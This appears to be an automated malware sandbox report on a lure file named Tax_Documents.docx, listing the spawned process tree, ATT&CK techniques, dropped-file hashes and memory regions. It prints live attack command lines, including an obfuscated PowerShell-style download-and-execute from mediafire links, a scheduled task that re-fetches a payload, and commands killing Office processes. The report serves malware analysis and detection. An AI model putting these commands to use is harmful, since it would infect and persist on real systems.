"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Tax_Documents.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4264

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2640

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5012

C:\Windows\system32\wscript.exe
wscript C:\Users\Public\update.js
1⤵
- Process spawned unexpected child process
PID:4120

C:\ProgramData\ddond.com
C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3856

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
2⤵
- Creates scheduled task(s)
PID:2816

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1236

C:\ProgramData\ESETNONU.com
C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.cmdline"
2⤵
PID:3356

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp" "c:\Users\Admin\AppData\Local\Temp\jykbijxl\CSCA578ABDCEAB40CB886D1F9761B6B58.TMP"
3⤵
PID:3208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 176
3⤵
- Program crash
PID:2172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 536
3⤵
- Program crash
PID:2196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 536
3⤵
- Program crash
PID:428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 536
3⤵
- Program crash
PID:1932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
PID:1372

C:\ProgramData\hahahha.sdasd~txt
"C:\ProgramData\hahahha.sdasd~txt"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ESETNONU.com
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\ProgramData\ddond.com
Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
C:\ProgramData\ddond.com
Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
C:\ProgramData\hahahha.sdasd~txt
Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\ProgramData\hahahha.sdasd~txt
Filesize
313KB

MD5
55f92c397772b28ca0cd110a47cdef66

SHA1
d848821c21e08eacfbd531d64039bdb02888667b

SHA256
f70727686d1c3a2d0c67ef4de64837b484948a7f0c91a37996ecf4774aadc2da

SHA512
afa0a2208746cec47154698f58bd3fad0c2b673f3093fe27d494c04a33330a53114110b1d94298415df25959614d95d1ae5aca872ec03532ffc90ec93c449fa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9D527155-824E-4415-AA6A-00892BCC3AA3
Filesize
142KB

MD5
4039c07d407242d334ca1894e31b72c1

SHA1
3739f5bad3ef35a72b13788a8269542a5ecca64e

SHA256
d3ded76046aca6183dda52e597a7b83b8386b44f51ad0caef27b016650ebac7f

SHA512
1b9637fb9c8d8936e75593850f869ef9ad934c74c09940dbbad18297dbf168e9cba774d4371883ed831e83b43e0bb8ecf9afbfcf16910598c4258398664a468f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
Filesize
303KB

MD5
0e73fd13113616785de72a65790702a0

SHA1
004e11d2babe327942e19845c288bb42d885549f

SHA256
e22214c59a03a88a42a3e62270b9eff765e95e68b6f4cc03e1f0d0ee638b0266

SHA512
845cf0ecb6fb6b7ed73d9b21957f5a50d8fe8c62d3aa5211d43f24d47f1eb3a041bb84cc9373272c959c33ca0eba643dbec161319dbba7b3dec37ab241b32da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp
Filesize
1KB

MD5
547c51ab7f975683344d84a4bd2ff85a

SHA1
f052b59d51428f7fd6a6dc6b221884d069c44023

SHA256
6e9f0be8f6ba1576bbbb8bb847db43936e358e02b880f4f556bc048639f25a0c

SHA512
25285dbb59086ccf14ea006e2c341dd404f4c0526dcc861345d36e72532b9acf25016d20c5f720ac5f0d53f531f8c75ae9120bb9f82fa38f4e9dfc44e70292e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.dll
Filesize
3KB

MD5
5b9cb7454aef64cd6207f3b2075084bf

SHA1
39ffae38556a112d5ed4a80a4389eea9b808be12

SHA256
6a4a8436d94616f192ed8094fbac2377a503a62a304462d71f9499bf63f2e429

SHA512
e1024895612b0840793e87ec799263a7417804ede9e0ec7dba5f137e3969e5635dca7f3282895a8f71ee39cac12ff9223ad9cc56dd0a660a8bc454a391d0ae2b

Download Submit
C:\Users\Admin\Downloads\Tax_Documents.docx
Filesize
290KB

MD5
e7bc410788af86fe5e41695dd0ae308b

SHA1
8d9f55c90db961ea66993fd03e148b0dc9bcec5b

SHA256
8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

SHA512
2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

Download Submit
C:\Users\Public\update.js
Filesize
1KB

MD5
b2a6eb01401e4a297b4e97a197af123d

SHA1
fb7334316dd8b4eba10121b023e7e35d68a8e6a6

SHA256
8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

SHA512
b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\CSCA578ABDCEAB40CB886D1F9761B6B58.TMP
Filesize
652B

MD5
c101d8d0b03add4e2b7b25d126205229

SHA1
c4e40c972c56a98761fcecd845c3791c35adac39

SHA256
e2e1ac7b27d44aab6f2e819ccbe9dc1e2bfe851585a316e45b0741b73450f8f6

SHA512
3ee9d5cf51a8277f6a10e8453f18b27552d2658f84317092cead586515e46a131c028f667c6f384b9673268b3418adba99e0853404527b712966208fb3c30458

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.0.cs
Filesize
840B

MD5
268033bad46157d9949101dfdbd69f95

SHA1
14a7532c9470d058536ff71251abc55320dee08e

SHA256
17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

SHA512
09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jykbijxl\jykbijxl.cmdline
Filesize
369B

MD5
2ed8c1590e8180be4d31fa075dc39612

SHA1
0c7b165d38adfd120513e0f48b5e4273cc08654a

SHA256
4321651b6ea8fbdf01bc7500abab7027164755ab39591468479f847009416987

SHA512
d64e43b146fbfdb3070209bff9f8c04ea0e1ec405367d8beabe874c10c565339cd4189c7277b6ec8ec52b01f7ee89b1eb255f4a147fd15291ff08527beb96f83

Download Submit
memory/752-376-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/752-371-0x0000000000405CE2-mapping.dmp

Download
memory/752-370-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/1372-395-0x0000000000405CE2-mapping.dmp

Download
memory/1572-339-0x0000000000000000-mapping.dmp

Download
memory/1980-341-0x0000000000000000-mapping.dmp

Download
memory/2640-255-0x0000000000000000-mapping.dmp

Download
memory/2816-338-0x0000000000000000-mapping.dmp

Download
memory/2856-405-0x0000000000000000-mapping.dmp

Download
memory/2856-408-0x00000000001C0000-0x0000000000214000-memory.dmp

Filesize
336KB

Download
memory/2856-410-0x0000000002120000-0x0000000002132000-memory.dmp

Filesize
72KB

Download
memory/2856-412-0x0000000002180000-0x00000000021BE000-memory.dmp

Filesize
248KB

Download
memory/2856-411-0x0000000002250000-0x0000000002252000-memory.dmp

Filesize
8KB

Download
memory/2856-413-0x0000000002252000-0x0000000002254000-memory.dmp

Filesize
8KB

Download
memory/3208-362-0x0000000000000000-mapping.dmp

Download
memory/3356-359-0x0000000000000000-mapping.dmp

Download
memory/3392-383-0x0000000000405CE2-mapping.dmp

Download
memory/3880-354-0x000002399E2E6000-0x000002399E2E8000-memory.dmp

Filesize
8KB

Download
memory/3880-346-0x000002399E2F0000-0x000002399E312000-memory.dmp

Filesize
136KB

Download
memory/3880-369-0x000002399E420000-0x000002399E436000-memory.dmp

Filesize
88KB

Download
memory/3880-366-0x000002399E2D0000-0x000002399E2D8000-memory.dmp

Filesize
32KB

Download
memory/3880-351-0x000002399E2E3000-0x000002399E2E5000-memory.dmp

Filesize
8KB

Download
memory/3880-350-0x000002399E2E0000-0x000002399E2E2000-memory.dmp

Filesize
8KB

Download
memory/3880-349-0x000002399E4A0000-0x000002399E516000-memory.dmp

Filesize
472KB

Download
memory/3936-377-0x0000000000405CE2-mapping.dmp

Download
memory/4264-116-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/4264-118-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/4264-119-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/4264-117-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/4300-343-0x0000000000000000-mapping.dmp

Download
memory/5012-389-0x0000000000405CE2-mapping.dmp

Download
memory/5012-333-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/5012-330-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/5012-332-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download
memory/5012-329-0x00007FFEEB1E0000-0x00007FFEEB1F0000-memory.dmp

Filesize
64KB

Download